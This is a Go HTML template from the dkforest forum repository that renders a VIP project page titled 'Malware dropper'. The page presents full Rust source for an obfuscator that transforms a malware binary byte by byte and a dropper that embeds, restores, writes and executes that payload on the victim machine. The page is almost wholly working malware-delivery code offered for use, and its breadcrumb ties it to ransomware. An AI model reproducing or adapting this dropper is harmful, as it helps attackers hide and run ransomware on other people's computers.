dkforest

A forum and chat platform (onion)
git clone https://git.dasho.dev/n0tr1v/dkforest.git
Log | Files | Refs | LICENSE

malware-dropper.gohtml (7407B)

      1 {{ define "sub-content" }}
      2 
      3 <nav aria-label="breadcrumb">
      4   <ol class="breadcrumb">
      5     <li class="breadcrumb-item"><a href="/vip">VIP</a></li>
      6     <li class="breadcrumb-item"><a href="/vip/projects">Projects</a></li>
      7     <li class="breadcrumb-item active">{{ t "Rust Ransomware" . }}</li>
      8   </ol>
      9 </nav>
     10 
     11 <h3>Malware dropper</h3>
     12 <p>
     13 </p>
     14 
     15 <p>Full source code (rust):</p>
     16 
     17 <h4 class="mt-5 mb-3">obfuscator/main.rs</h4>
     18 <!-- Code begin -->
     19 <div style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
     20     <table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
     21 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
     22 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
     23 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
     24 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
     25 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
     26 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
     27 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
     28 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
     29 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
     30 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
     31 </span></pre></td>
     32         <td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
     33 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="color:#66d9ef">use</span> std::fs;
     34 
     35 <span style="color:#75715e">// Malware obfuscator takes the released &#34;malware&#34; and multiply each bytes by 255
     36 </span><span style="color:#75715e"></span><span style="color:#75715e">// to produce the &#34;malware_obfuscated&#34; file that will be embedded inside the &#34;dropper&#34;
     37 </span><span style="color:#75715e"></span><span style="color:#66d9ef">fn</span> <span style="color:#a6e22e">main</span>() {
     38     <span style="color:#66d9ef">let</span> content <span style="color:#f92672">=</span> fs::read(<span style="color:#e6db74">&#34;./malware&#34;</span>).unwrap();
     39     <span style="color:#66d9ef">let</span> obfuscated: Vec<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">u8</span><span style="color:#f92672">&gt;</span> <span style="color:#f92672">=</span> content.iter().map(<span style="color:#f92672">|</span>c<span style="color:#f92672">|</span> c.wrapping_mul(<span style="color:#ae81ff">255</span>)).collect();
     40     fs::write(<span style="color:#e6db74">&#34;./malware_obfuscated&#34;</span>, obfuscated).unwrap();
     41 }
     42 
     43 </pre></td></tr></table>
     44 </div>
     45 <!-- Code end -->
     46 
     47 <h4 class="mt-5 mb-3">dropper/main.rs</h4>
     48 
     49 <!-- Code begin -->
     50 <div style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
     51   <table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
     52 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
     53 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
     54 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
     55 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
     56 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
     57 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
     58 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
     59 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
     60 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
     61 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
     62 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
     63 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
     64 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
     65 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
     66 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
     67 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
     68 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">17
     69 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">18
     70 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">19
     71 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">20
     72 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">21
     73 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">22
     74 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">23
     75 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">24
     76 </span></pre></td>
     77     <td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
     78 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="color:#66d9ef">use</span> std::fs;
     79 <span style="color:#66d9ef">use</span> std::io::Write;
     80 <span style="color:#66d9ef">use</span> std::os::unix::fs::OpenOptionsExt;
     81 <span style="color:#66d9ef">use</span> std::process::Command;
     82 
     83 <span style="color:#66d9ef">fn</span> <span style="color:#a6e22e">main</span>() {
     84     <span style="color:#66d9ef">let</span> ransomware_bytes <span style="color:#f92672">=</span> include_bytes<span style="color:#f92672">!</span>(<span style="color:#e6db74">&#34;malware_obfuscated&#34;</span>);
     85     <span style="color:#75715e">// de-obfuscate embedded binary
     86 </span><span style="color:#75715e"></span>    <span style="color:#66d9ef">let</span> decrypted: Vec<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">u8</span><span style="color:#f92672">&gt;</span> <span style="color:#f92672">=</span> ransomware_bytes
     87         .iter()
     88         .map(<span style="color:#f92672">|</span>c<span style="color:#f92672">|</span> c.wrapping_mul(<span style="color:#ae81ff">255</span>))
     89         .collect();
     90     <span style="color:#75715e">// drop the binary on the machine
     91 </span><span style="color:#75715e"></span>    <span style="color:#66d9ef">let</span> <span style="color:#66d9ef">mut</span> f <span style="color:#f92672">=</span> fs::OpenOptions::new()
     92         .create(<span style="color:#66d9ef">true</span>)
     93         .write(<span style="color:#66d9ef">true</span>)
     94         .mode(<span style="color:#ae81ff">0o777</span>)
     95         .open(<span style="color:#e6db74">&#34;malware_dropped&#34;</span>)
     96         .unwrap();
     97     f.write(decrypted.as_slice()).unwrap();
     98     <span style="color:#75715e">// Execute the binary
     99 </span><span style="color:#75715e"></span>    Command::new(<span style="color:#e6db74">&#34;./malware_dropped&#34;</span>).output().unwrap();
    100 }
    101 
    102 </pre></td></tr></table>
    103 </div>
    104 <!-- Code end -->
    105 
    106 {{ end }}